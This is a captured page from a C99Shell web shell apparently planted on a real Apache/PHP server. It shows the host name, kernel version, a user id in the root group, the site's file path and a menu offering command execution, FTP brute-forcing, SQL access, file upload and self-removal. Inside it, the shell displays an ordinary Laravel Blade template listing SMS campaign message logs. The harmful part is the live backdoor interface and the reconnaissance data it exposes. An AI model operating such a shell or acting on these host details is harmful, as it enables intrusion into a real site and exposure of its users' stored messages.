!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/portfolio.picotech.app/public_html/resources/views/customer/campaign/   drwxr-xr-x
Free 28.8 GB of 117.98 GB (24.41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     statistic.blade.php (10.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.customer')

@section('title') Campaign Statistic @endsection

@section('extra-css')
    <link rel="stylesheet" href="{{asset('plugins/datatables-bs4/css/dataTables.bootstrap4.min.css')}}">
    <link rel="stylesheet" href="{{asset('plugins/datatables-responsive/css/responsive.bootstrap4.min.css')}}">
@endsection

@section('content')
    <!-- Main content -->
    <section class="content">
        <div class="row">
            <div class="col-6 mt-3">
                <div class="card">
                    <div class="card-header">
                        <h2 class="card-title">Running</h2>
                    </div>
                    <!-- /.card-header -->
                    <div class="card-body table-body">
                        <table id="campaignReports" class="table table-striped table-bordered dt-responsive nowrap">
                            <thead>
                            <tr>
                                <th>@lang('customer.from')</th>
                                <th>@lang('customer.to')</th>
                                <th>@lang('customer.message')</th>
                                <th>@lang('customer.schedule_at')</th>
                            </tr>
                            </thead>
                            <tbody>
                            @if($messageRunningLogs->isNotEmpty())
                                @foreach($messageRunningLogs as $message_log)
                                    <tr>
                                        <td>{{$message_log->from}}</td>
                                        <td>{{$message_log->to}}</td>
                                        <td>
                                            <div class="show-more">
                                                {{$message_log->body}}
                                            </div>
                                        </td>
                                        <td>{{($message_log->schedule_datetime)}}</td>
                                    </tr>
                                @endforeach
                            @else
                                <tr class="text-center">
                                    <td colspan="5"><strong>No Data Available</strong></td>
                                </tr>
                            @endif
                            </tbody>
                        </table>
                        <div class="mt-2">
                            {{$messageRunningLogs->appends(['running' => $messageRunningLogs->currentPage()])->links()}}
                        </div>
                    </div>
                    <!-- /.card-body -->
                </div>
                <!-- /.card -->
            </div>

            <div class="col-6 mt-3">
                <div class="card">
                    <div class="card-header">
                        <h2 class="card-title">Paused</h2>
                    </div>
                    <!-- /.card-header -->
                    <div class="card-body table-body">
                        <table id="campaignReports" class="table table-striped table-bordered dt-responsive nowrap">
                            <thead>
                            <tr>
                                <th>@lang('customer.from')</th>
                                <th>@lang('customer.to')</th>
                                <th>@lang('customer.message')</th>
                                <th>@lang('customer.schedule_at')</th>
                            </tr>
                            </thead>
                            <tbody>
                            @if($messagePausedLogs->isNotEmpty())
                                @foreach($messagePausedLogs as $message_log)
                                    <tr>
                                        <td>{{$message_log->from}}</td>
                                        <td>{{$message_log->to}}</td>
                                        <td>
                                            <div class="show-more">
                                                {{$message_log->body}}
                                            </div>
                                        </td>
                                        <td>{{formatDate($message_log->schedule_datetime)}}</td>
                                    </tr>
                                @endforeach
                            @else
                                <tr class="text-center">
                                    <td colspan="5"><strong>No Data Available</strong></td>
                                </tr>
                            @endif
                            </tbody>
                        </table>
                        <div class="mt-2">
                            {{$messagePausedLogs->appends(['paused' => $messagePausedLogs->currentPage()])->links()}}
                        </div>
                    </div>
                    <!-- /.card-body -->
                </div>
                <!-- /.card -->
            </div>

            <div class="col-6 mt-3">
                <div class="card">
                    <div class="card-header">
                        <h2 class="card-title">Failed</h2>
                    </div>
                    <!-- /.card-header -->
                    <div class="card-body table-body">
                        <table id="messageFailedLogs" class="table table-striped table-bordered dt-responsive nowrap">
                            <thead>
                            <tr>
                                <th>@lang('customer.from')</th>
                                <th>@lang('customer.to')</th>
                                <th>@lang('customer.message')</th>
                                <th>@lang('customer.response_code')</th>
                                <th>@lang('customer.failed_at')</th>
                            </tr>
                            </thead>
                            <tbody>
                            @if($messageFailedLogs->isNotEmpty())
                                @foreach($messageFailedLogs as $message_log)
                                    <tr>
                                        <td>{{$message_log->from}}</td>
                                        <td>{{$message_log->to}}</td>
                                        <td>
                                            <div class="show-more">
                                                {{$message_log->body}}
                                            </div>
                                        </td>
                                        <td>{{$message_log->response_code}}</td>
                                        <td>{{formatDate($message_log->updated_at)}}</td>
                                    </tr>
                                @endforeach
                            @else
                                <tr class="text-center">
                                    <td colspan="5"><strong>No Data Available</strong></td>
                                </tr>
                            @endif
                            </tbody>
                        </table>
                        <div class="mt-2">
                            {{$messageFailedLogs->appends(['failed' => $messageFailedLogs->currentPage()])->links()}}
                        </div>
                    </div>
                    <!-- /.card-body -->
                </div>
                <!-- /.card -->
            </div>

            <div class="col-6 mt-3">
                <div class="card">
                    <div class="card-header">
                        <h2 class="card-title">Delivered</h2>
                    </div>
                    <!-- /.card-header -->
                    <div class="card-body table-body">
                        <table id="campaignReports" class="table table-striped table-bordered dt-responsive nowrap">
                            <thead>
                            <tr>
                                <th>@lang('customer.from')</th>
                                <th>@lang('customer.to')</th>
                                <th>@lang('customer.message')</th>
                                <th>@lang('customer.schedule_at')</th>
                                <th>@lang('customer.delivered_at')</th>
                            </tr>
                            </thead>
                            <tbody>
                            @if($messageDeliveredLogs->isNotEmpty())
                                @foreach($messageDeliveredLogs as $message_log)
                                    <tr>
                                        <td>{{$message_log->from}}</td>
                                        <td>{{$message_log->to}}</td>
                                        <td>
                                            <div class="show-more">
                                                {{$message_log->body}}
                                            </div>
                                        </td>
                                        <td>{{($message_log->schedule_datetime)}}</td>
                                        <td>{{formatDate($message_log->updated_at)}}</td>
                                    </tr>
                                @endforeach
                            @else
                                <tr class="text-center">
                                    <td colspan="5"><strong>No Data Available</strong></td>
                                </tr>
                            @endif
                            </tbody>
                        </table>
                        <div class="mt-2">
                            {{$messageDeliveredLogs->appends(['delivered' => $messageDeliveredLogs->currentPage()])->links()}}
                        </div>
                    </div>
                    <!-- /.card-body -->
                </div>
                <!-- /.card -->
            </div>

            <!-- /.col -->
        </div>
        <!-- /.row -->
    </section>
    <!-- /.content -->
@endsection

@section('extra-scripts')
    <script>
        $(".show-more").css('overflow', 'hidden').readmore({collapsedHeight: 20});
    </script>
@endsection



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]--